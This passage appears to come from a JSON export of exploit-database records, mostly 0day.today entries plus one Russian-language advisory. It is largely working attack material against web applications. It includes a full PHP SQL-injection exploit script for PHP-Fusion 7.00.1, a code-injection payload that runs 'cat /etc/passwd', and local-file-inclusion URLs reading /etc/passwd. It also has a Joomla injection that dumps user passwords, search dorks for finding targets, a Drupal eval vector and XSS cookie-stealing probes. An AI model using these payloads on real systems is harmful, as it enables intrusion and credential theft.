PHP include when the note is rendered.\r\nRudimentary JavaScript provides client side validation of input data,\r\nbut if an attacker arbitrarily submitted a form with the following data:\r\n\r\nlinkname=evil_link&linkurl=\";$url=system('cat\r\n/etc/passwd');$foo=\"&linkdescription=test2&groupname=test+group&linksubmit=Make+Link\r\n\r\nThe URL variable is overwritten with injected definition. Looking at\r\nthe evil_link.link file created on the filesystem we see:\r\n\r\n$ cat evil_link.link\r\n<?php\r\n$url=\"\";$url=system('cat /etc/passwd');$foo=\"\";\r\n$name=\"evil_link\";\r\n$description=\"test2\";\r\n?>\r\n\r\nThus we have arbitrarily overwritten the $url variable and assigned it\r\nthe value that returns from the output of our system call. In fact, now\r\nwhen a user viewed the Links page they could read the /etc/passwd file\r\nvia a web browser.\r\n\r\nConclusions:\r\n\r\nI stopped poking at pPIM after gleaning these details as it became\r\nabundantly clear that the application is thoroughly riddled with holes.\r\n pPIM fails to enforce any security in it's code, and deploying the\r\napplication produces a gaping hole in the security of any host.\r\n\r\nRecommendations:\r\n\r\nUninstall pPIM immediately!\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4883"}, {"lastseen": "2018-01-01T23:01:28", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-20T00:00:00", "published": "2008-11-20T00:00:00", "id": "1337DAY-ID-4215", "href": "https://0day.today/exploit/description/4215", "type": "zdt", "title": "PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit", "sourceData": "=============================================================\r\nPHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\r\n=============================================================\r\n\r\n\r\n<?php\r\n/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\r\n PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\r\n requires magic_quotes == off\r\n\r\n coded by irk4z\r\n homepage: http://irk4z.wordpress.com\r\n\r\n greets: all friends ;)\r\n*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n$login = $argv[3];\r\n$pass = $argv[4];\r\n$sql_injection = $argv[5];\r\n\r\necho\r\n\"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\\n\".\r\n\" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\\n\".\r\n\" requires magic_quotes == off\\n\".\r\n\"\\n\".\r\n\" coded by irk4z[at]yahoo.pl\\n\".\r\n\" homepage: http://irk4z.wordpress.com\\n\".\r\n\"\\n\".\r\n\" greets: all friends ;)\\n\".\r\n\"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\\n\";\r\n\r\nif(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){\r\n\techo \"Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\\n\" .\r\n\t\t \" php $argv[0] localhost /php-fusion/ user s3cret \\\"SELECT database()\\\"\\n\".\r\n\t\t \" php $argv[0] localhost / user s3cret \\\"SELECT load_file(0x2F6574632F706173737764)\\\"\\n\\n\";\r\n\tdie;\r\n}\r\n\r\necho \"Logging into system...\";\r\n//login to php-fusion using login and pass\r\n$login_data = send($host, array(\t\"path\" => $path.\"news.php\",\r\n\t\t\t\t\t\"post\" => array(\r\n\t\t\t\t\t\t\t\"user_name\" => $login,\r\n\t\t\t\t\t\t\t\"user_pass\" => $pass,\r\n\t\t\t\t\t\t\t\"login\" => \"Login\"\r\n\t\t\t\t\t\t\t)\r\n\t\t\t\t)\r\n\t\t\t);\r\n\r\n//get cookies\r\npreg_match_all(\"/Set-Cookie:[\\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\\.]+;)/\", $login_data, $matches);\r\n$cookies = implode(' ', $matches[1]);\r\n\r\n//get user id\r\npreg_match_all(\"/([0-9])+.([a-zA-Z0-9]{32})/\", $cookies, $matches);\r\n$my_id = $matches[1][0];\r\n\r\nif(empty($my_id)){\r\n\techo \"\\n[x] Incorrect login or password..\";\r\n\tdie;\r\n} else {\r\n\techo \"[ok]\\n\";\r\n}\r\n\r\n$id_message = uniqid();\r\n$inhex = '';\r\nfor($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;\r\n\r\necho \"Running sql-injection...\\n\";\r\n//running sql-injection\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?msg_send={$my_id}%27%2F%2Axxx&\",\r\n\t\t\t\t\"cookie\" => $cookies,\r\n\t\t\t\t\"post\" => array(\r\n\t\t\t\t\t\t\"send_message\" => 'X',\r\n\t\t\t\t\t\t\"subject\" => \"X*/,0x{$inhex},\t\t\t\t\t\t\t\t(SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*\",\r\n\t\t\t\t\t\t\"message\" => \"XXX\"\r\n\t\t\t\t\t\t)\r\n\t\t\t)\r\n\t\t);\r\n\r\necho \"Getting data...\\n\\n\";\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?folder=outbox\",\r\n\t\t\t\t\"cookie\" => $cookies )\r\n\t\t\t);\r\n\r\npreg_match_all(\"/msg_read=([0-9]+)'>{$id_message}<\\/a>/\", $res, $matches);\r\n$id_message_number = $matches[1][0];\r\n\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?folder=outbox&msg_read=\".$id_message_number,\r\n\t\t\t\t\"cookie\" => $cookies )\r\n\t\t);\r\n\r\npreg_match_all(\"/{$id_message}{$id_message}(.*){$id_message}{$id_message}/\", $res, $matches);\r\n\r\nif( empty($matches[1][0]) ){\r\n\techo \"[x] Failed... maybe SQL-INJ is incorrect?\\n\\n\";\r\n} else {\r\n\t$tmp = '';\r\n\t$hex = $matches[1][0];\r\n\t//unhex it!\r\n\tfor($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));\r\n\techo \"DATA: \\n\".$tmp.\"\\n\\n\";\r\n}\r\n\r\necho \"Deleting message...\\n\";\r\n\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?folder=outbox&msg_id=\".$id_message_number,\r\n\t\t\t\t\"cookie\" => $cookies,\r\n\t\t\t\t\"post\" => array (\r\n\t\t\t\t\t\t\"delete\" => \"Delete\"\r\n\t\t\t\t\t\t)\r\n\t\t\t)\r\n\t\t);\r\n\r\n//send http packet\r\nfunction send($host, $dane = \"\") {\r\n\t$packet = (empty($dane['post']) ? \"GET\" : \"POST\") . \" {$dane[\"path\"]} HTTP/1.1\\r\\n\";\r\n\t$packet .= \"Host: {$host}\\r\\n\";\r\n\t\r\n\tif( !empty($dane['cookie']) ){\r\n\t\t$packet .= \"Cookie: {$dane['cookie']}\\r\\n\";\r\n\t}\r\n\t\r\n\tif( !empty($dane['post']) ){\r\n\t\t$reszta_syfu = \"\";\r\n\t\tforeach($dane['post'] as $tmp => $tmp2){\r\n\t\t\t$reszta_syfu .= $tmp . \"=\" . $tmp2 . \"&\";\r\n\t\t}\r\n\t\t$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t\t$packet .= \"Connection: Close\\r\\n\";\r\n\t\t$packet .= \"Content-Length: \".strlen($reszta_syfu).\"\\r\\n\\r\\n\";\r\n\t\t$packet .= $reszta_syfu;\r\n\t} else {\r\n\t\t$packet .= \"Connection: Close\\r\\n\\r\\n\";\r\n\t}\r\n\r\n\t$o = @fsockopen($host, 80);\r\n\tif(!$o){\r\n\t\techo \"\\n[x] No response...\\n\";\r\n\t\tdie;\r\n\t}\r\n\tfputs($o, $packet);\r\n\twhile (!feof($o)) $ret .= fread($o, 1024);\r\n\tfclose($o);\r\n\treturn ($ret);\r\n}\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4215"}, {"lastseen": "2018-03-10T00:10:32", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-09-24T00:00:00", "published": "2008-09-24T00:00:00", "id": "1337DAY-ID-3748", "href": "https://0day.today/exploit/description/3748", "type": "zdt", "title": "barcodegen <= 2.0.0 Local File Inclusion Vulnerability", "sourceData": "======================================================\r\nbarcodegen <= 2.0.0 Local File Inclusion Vulnerability\r\n======================================================\r\n\r\n\r\n\r\n :::::::-. ... ::::::. :::.\r\n ;;, `';, ;; ;;;`;;;;, `;;;\r\n `[[ [[[[' [[[ [[[[[. '[[\r\n $$, $$$$ $$$ $$$ \"Y$c$$\r\n 888_,o8P'88 .d888 888 Y88\r\n MMMMP\"` \"YmmMMMM\"\" MMM YM\r\n\r\n [ Discovered by dun ]\r\n\r\n ###################################################################\r\n # [ barcodegen <= 2.0.0 ] Local File Inclusion Vulnerability #\r\n ###################################################################\r\n #\r\n # Script: \"Barcode Generator 1D\"\r\n #\r\n # Script site: http://www.barcodephp.com/\r\n # Download: http://www.barcodephp.com/download.php\r\n #\r\n # Vuln: \r\n # http://site.com/[barcodegen.1d-v2.0.0]/html/image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=/../../../../../../../etc/passwd%00\r\n # \r\n #\r\n # Bug: ./barcodegen.1d-v2.0.0/html/image.php (lines: 2-8)\r\n #\r\n # ...\r\n # if(isset($_GET['code']) && isset($_GET['t']) && isset($_GET['r']) && isset($_GET['text']) && isset($_GET['f1']) \r\n # && isset($_GET['f2']) && isset($_GET['o']) && isset($_GET['a1']) && isset($_GET['a2'])) {\r\n #\trequire('config.php');\r\n #\trequire($class_dir.'/BCGColor.php');\r\n #\trequire($class_dir.'/BCGBarcode.php');\r\n #\trequire($class_dir.'/BCGDrawing.php');\r\n #\trequire($class_dir.'/BCGFont.php');\r\n #\tif(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {\t// LFI\r\n # ... \t\t\t \r\n #\r\n #\r\n ###############################################\r\n # Greetz: D3m0n_DE * str0ke * and otherz..\r\n ###############################################\r\n\r\n [ dun / 2008 ] \r\n\r\n*******************************************************************************************\r\n\r\n\r\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3748"}, {"lastseen": "2018-03-20T11:30:14", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-08-04T00:00:00", "published": "2008-08-04T00:00:00", "id": "1337DAY-ID-3504", "href": "https://0day.today/exploit/description/3504", "type": "zdt", "title": "Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities", "sourceData": "===========================================================\r\nDayfox Blog 4 Multiple Local File Inclusion Vulnerabilities\r\n===========================================================\r\n\r\n\r\n\r\n--------\r\nDiscoverd By :Virangar Security Team (hadihadi)\r\n\r\nspecial tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra\r\n\r\n& all virangar members & all iranian hackerz\r\n\r\ngreetz:to my best friend in the world hadi_aryaie2004\r\n& my lovely friend arash(imm02tal) from ISCN\r\n-----------------------------------\r\nDownload: http://www.dayfoxdesigns.co.nr\r\nDork:Powered by Dayfox Designs This is a port of WordPress \r\n-------------------------------------------------------------------------------------------------\r\nvuln codes in index.php:\r\n############line 140-144##################\r\nif (isset($_GET[\"cat\"])) {\r\n $page = 'entries/'.strip_tags(htmlspecialchars($_GET[\"cat\"])).'.txt';\r\n if (file_exists($page)) {\r\n echo \"<br /><a href=\\\"javascript: history.go(-1)\\\">< Back</a>\";\r\n @include (\"$page\");\r\n############line 173-178###################\r\nif (isset($_GET[\"p\"])) {\r\n $page = 'entries/'.strip_tags(htmlspecialchars($_GET[\"p\"])).'.txt';\r\n $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET[\"p\"])).'comments.txt';\r\n if (file_exists($page)) {\r\n echo '<br /><a href=\"javascript: history.go(-1)\">< Back</a>';\r\n include (\"$page\");\r\n############line 209-213##################\r\nif (isset($_GET[\"archive\"])) {\r\n $page = 'entries/'.strip_tags(htmlspecialchars($_GET[\"archive\"])).'.txt';\r\n if (file_exists($page)) {\r\n echo '<br /><a href=\"javascript: history.go(-1)\">< Back</a>';\r\n include (\"$page\");\r\n----------------------------------------------------------------------------------------------------\r\n\r\nexploit:\r\nhttp://site.com/index.php?p=../../../../../../../etc/passwd%00 \r\nhttp://site.com/index.php?cat=../../../../../../../etc/passwd%00\r\nhttp://site.com/index.php?archive=../../../../../../../etc/passwd%00\r\n--------\r\nyoung iranian h4ck3rz\r\n\r\n\r\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3504"}, {"lastseen": "2018-01-06T05:01:58", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-02-23T00:00:00", "published": "2008-02-23T00:00:00", "id": "1337DAY-ID-2687", "href": "https://0day.today/exploit/description/2687", "type": "zdt", "title": "Joomla Component simple shop 2.0 SQL Injection Vulnerability", "sourceData": "============================================================\r\nJoomla Component simple shop 2.0 SQL Injection Vulnerability\r\n============================================================\r\n\r\n\r\n\r\n###############################################################\r\n#\r\n# joomla com_simpleshop SQL Injection(section)\r\n#\r\n################################################################\r\n#\r\n# DORK 1 : allinurl:\"com_simpleshop\"\r\n#\r\n# DORK 2 : allinurl: \"com_simpleshop\"section\r\n#\r\n################################################################\r\nEXPLOIT :\r\n\r\nindex.php?option=com_simpleshop&[email\u00a0protected]&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*\r\n\r\n\r\r\n\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2687"}, {"lastseen": "2018-03-03T01:41:53", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-10-10T00:00:00", "published": "2007-10-10T00:00:00", "id": "1337DAY-ID-2213", "href": "https://0day.today/exploit/description/2213", "type": "zdt", "title": "Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector", "sourceData": "=============================================================\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n=============================================================\r\n\r\n\r\n\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n\r\nExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2213"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435 3APA3A!\r\n\r\n\u0421\u043e\u043e\u0431\u0449\u0430\u044e \u0432\u0430\u043c \u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u043c\u043d\u043e\u044e \u043d\u043e\u0432\u044b\u0445 Cross-Site Scripting, SQL Injection \u0438 SQL DB Structure Extraction \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 Cetera eCommerce.\r\n\r\nXSS (WASC-08) (\u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 15.0):\r\n\r\nhttp://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/\r\n\r\nhttp://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/\r\n\r\nhttp://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/\r\n\r\nhttp://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/\r\n\r\nhttp://site/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/\r\n\r\nXSS (WASC-08):\r\n\r\nhttp://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/\r\n\r\n\u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 15.0. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043c\u0435\u0435\u0442 \u043c\u0435\u0441\u0442\u043e \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u0441 404 \u043e\u0448\u0438\u0431\u043a\u043e\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043d\u0430 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043a\u0430\u043a \u043f\u043e \u044d\u0442\u043e\u043c\u0443 \u0430\u0434\u0440\u0435\u0441\u0443,\r\n\u0442\u0430\u043a \u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u0438\u043c \u0430\u0434\u0440\u0435\u0441\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0435\u0434\u0443\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b.\r\n\r\nSQL Injection (WASC-19):\r\n\r\nhttp://site/catalog/(version()=5.1)/\r\n\r\nhttp://site/catalog/cart/\u2019+benchmark(100000,md5(now()))+\u2019/\r\n\r\nSQL DB Structure Extraction (WASC-13):\r\n\r\nhttp://site/catalog/%22/\r\n\r\nhttp://site/catalog/cart/\u2019/\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b Cetera eCommerce 14.0 \u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438, \u0430 XSS \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0430\u043a\u0436\u0435 \u043a\u0430\u0441\u0430\u044e\u0442\u0441\u044f \u0432\u0435\u0440\u0441\u0438\u0438 15.0. \u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0447\u0435\u0442\u044b\u0440\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b\r\n\u0432 \u0432\u0435\u0440\u0441\u0438\u0438 Cetera eCommerce 15.0 (\u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u0448\u043b\u0430 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 2010 \u0433\u043e\u0434\u0430).\r\n\r\n\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0443 \u043c\u0435\u043d\u044f \u043d\u0430 \u0441\u0430\u0439\u0442\u0435:\r\nhttp://websecurity.com.ua/4883/\r\n\r\nBest wishes & regards,\r\nMustLive\r\n\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0441\u0430\u0439\u0442\u0430\r\nhttp://websecurity.com.ua", "modified": "2011-03-29T00:00:00", "published": "2011-03-29T00:00:00", "id": "SECURITYVULNS:DOC:26008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26008", "title": "XSS, SQL Injection \u0438 SQL DB Structure Extraction \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Cetera eCommerce", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}